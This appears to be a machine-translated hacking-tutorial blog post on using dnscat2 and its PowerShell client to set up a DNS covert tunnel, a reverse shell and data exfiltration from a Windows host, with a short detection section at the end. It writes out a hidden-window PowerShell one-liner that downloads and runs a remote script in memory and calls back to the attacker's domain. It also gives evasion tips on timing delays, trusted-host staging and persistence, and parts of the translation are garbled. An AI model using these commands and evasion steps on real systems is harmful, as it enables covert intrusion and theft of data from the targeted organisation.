Hacking Book | Free Online Hacking Learning


powershell + dnscat2 to realize dns hidden tunnel bounce shell and detection method

Posted by graebner at 2020-03-16

Readers may have heard a lot of big data analysis and artificial intelligence security lectures. The effect of those architecture diagrams built by dense boxes, and how advanced technology can be implemented in products are very simple. Let's try common threat tools one by one to make it clear. This series of articles describes how to use advanced threat techniques and tools that are difficult to prevent with traditional security measures, and demonstrate one by one that standardized products with machine learning ability can be successfully tested.

In the Intranet environment with strict security policy, common C & C communication ports are monitored by many security devices. If the red team penetrates the terminal of the target intranet, it is found that the network segment only allows the white list traffic out of the station, and other ports are blocked, the traditional C & C communication means cannot be established, so it is very difficult to rebound the shell. In this case, red team has a final choice: use DNS hidden tunnel to build reverse shell. This paper demonstrates the use of dnscat2 and dnscat2 PowerShell open-source tools to build a C & C infrastructure using DNS hidden tunnel, and transfer data outside, bypassing the detection of traditional security products.

1. Tools

This demonstration uses two software:

Dnscat2 is an open source software. It uses DNS protocol to create encrypted C & C channel, providing server and client

Website: https://github.com/iagox86/dnscat2

Dnscat2 PowerShell is a PowerShell version of dnscat2 client

Website: https://github.com/lukebaggett/dnscat2-powershell

Only the official client of dnscat2 can also create reverse shell. It only needs to download the Win32 running program to the target terminal to run locally. Although the general anti-virus software does not alarm, it always feels inappropriate. Of course, readers can also try to transcode the official client and construct IEX, but that's another topic. I plan to write it later. From the point of view of simple and easy to use demonstration content, dnscat2 PowerShell is more suitable for the purpose of this article.

2. Erection of C & C

First, assume the infrastructure for control. The author chooses an Alibaba cloud server to install Ubuntu 16.04 as the C & C server, a Windows 10 x64 virtual machine as the target of data theft, and a configurable domain name.

DNS tunnel diagram

Although dnscat2 provides the function of 53 port direct connection server, in order to achieve the best hidden tunnel effect, you need to configure the domain name cirrus. [domain]: create a record, point your own domain name resolution server (NS. Cirrus. [domain]) to the cloud server (IP: 3 *. 1 * *. *. *. *. *. *); then create an ns record and give the resolution of dnsch subdomain name to ns. Cirrus. [domain].

Install the dnsct2 server on the ECS (IP: 3 *. 1 * *. *. *. * *. *). * *. *. * *). If you are familiar with ruby and gem, the installation is very simple. You can skip the following commands.

Next, install dnscat2 server.

Ruby will prompt when to use root permission.

If all goes well, you can enter the following command to start the server:

# sudo ruby ./dnscat2.rb dnsch.cirrus.[domain] -e open -c dnschcirrus --no-cache

Please pay attention to changing dnsch. Cirrus. [domain] to your own domain name. In the command line, the - C parameter defines pre shared secret. Using the same encrypted secret dnschcirrus on the server and client can prevent man in the middle attack. Otherwise, the transmission data is not encrypted and may be restored by a third party monitoring network traffic. If not defined, dnscat2 Server will generate a string, remember to copy it and use it when starting the client. -The e parameter can specify the security level, and the open parameter allows the client to choose. --No cache, be sure to add the no cache option when running the server, because the caching mode of PowerShell dnscat2 client and dnscat2 server is not compatible.

If you do not give root permission, you cannot listen to port 53 used by DNS service.

3. Target host load client

Dnscat2 also has a compiled Windows client. Interested readers can download and try it on their own. Using powershell-dnscat2, in addition to obtaining an interactive reverse shell, relies on the PowerShell standard IEX loading script mode to download from an external trusted website to memory for reuse. The running client of fileless avoids the landing of files and reduces the risk. The links given on the official website are:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Readers can also place the content of dnscat2.ps1 on the server trusted by the target network to avoid monitoring.

For the red team, the following parameters to start the client need to be taken seriously.

Among them, delay and maxrandomdelay options are very important for hiding penetration behavior, otherwise, DNS tunneling communication behavior is too intensive and easy to be found.

Let's reconstruct the PowerShell command to implement one sentence script, which is easier to use and less attention:

powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

Please note that set up the presharedsecret for the same communication encryption as the server, and replace your own domain name. Other parameters such as bypass are added according to the needs of the readers.

4. Rebound shell over DNS hidden tunnel

At this time, we can see the client online prompt on the server.

Use the windows command to see what the current control processes are.

At the prompt, enter window-i 9 to enter tasktop-eqirg2l, then start the shell, and you can enter commands interactively and view them.

Specific dnscat2 control command use I will not go into detail, readers can consult the document.

Readers can also try persistence by adding the PowerShell command above to the startup execution.

If you use dnscat2's own client on the target terminal, it is shown below.

5. Traffic characteristics of DNS hidden tunnel

Let's look at the tunnel traffic data used by dnscat2.

It's easy to notice that CNAME, MX, and TXT records are mainly used for query.

Dnscat2 has a separate server (Ruby) and client (c). The author implements a converter, which turns all the data transferred into byte stream. Therefore, dnscat2 has a private data transmission layered protocol, running on the DNS layer below.

Compared with the DNS hidden tunnel utilization of cobalt strike mentioned in the previous article, we can find that the self format protocol of dnscat2 is obviously not clear enough. For example, the default setting of cobalt strike is to send a record resolution request in the format of [session ID]. Dnsch. Cirrus. [domain] every 60 seconds and report to C2 server to go online; use a record query to upload data to server, use TXT record to download instructions and payloads, etc.

All data in both the upload and download directions of dnscat2 is transmitted with a hexadecimal encoded string, for example, AAA is converted to 41414. Any decimal point in the domain name is ignored, so 41.4141, 414.141, and 414141 are exactly equivalent. In addition, the protocol is case insensitive, so 5B and 5b are also equivalent (it is important that client and server handle case).

Here, it must be added that the author has quickly scanned the code implementation of dnsct2 and found that the communication fault tolerance and correction mechanism is not perfect, so there is a great chance of unstable operation. Interested readers can also modify the optimization to improve its reliability, and add more ability to avoid detection.

DNS covert tunnel detection is a key technology to identify unknown threats. The aftermath of POS Trojan that shocked the retail industry is still spreading, and giants such as home depot and target have paid a heavy price. In this event, the rampant framework POS Trojan adopted the method of DNS covert channel to return data and upload the credit card data found in memory to the server. The specific format is as follows

Last year, the xshell software that attracted widespread attention was implanted into Trojan horse attacks, and DGA and DNS tunneling techniques were also used:

There is no doubt that the DLP and NTA standard products of Scarlett have been able to accurately detect dnscat2 rebound shell, and the alarm screenshot is as follows:

This series of tutorials introduces techniques, tactics, and tools to demonstrate common external intrusions and internal threats, and gives practical methods for detection and response using existing mature products.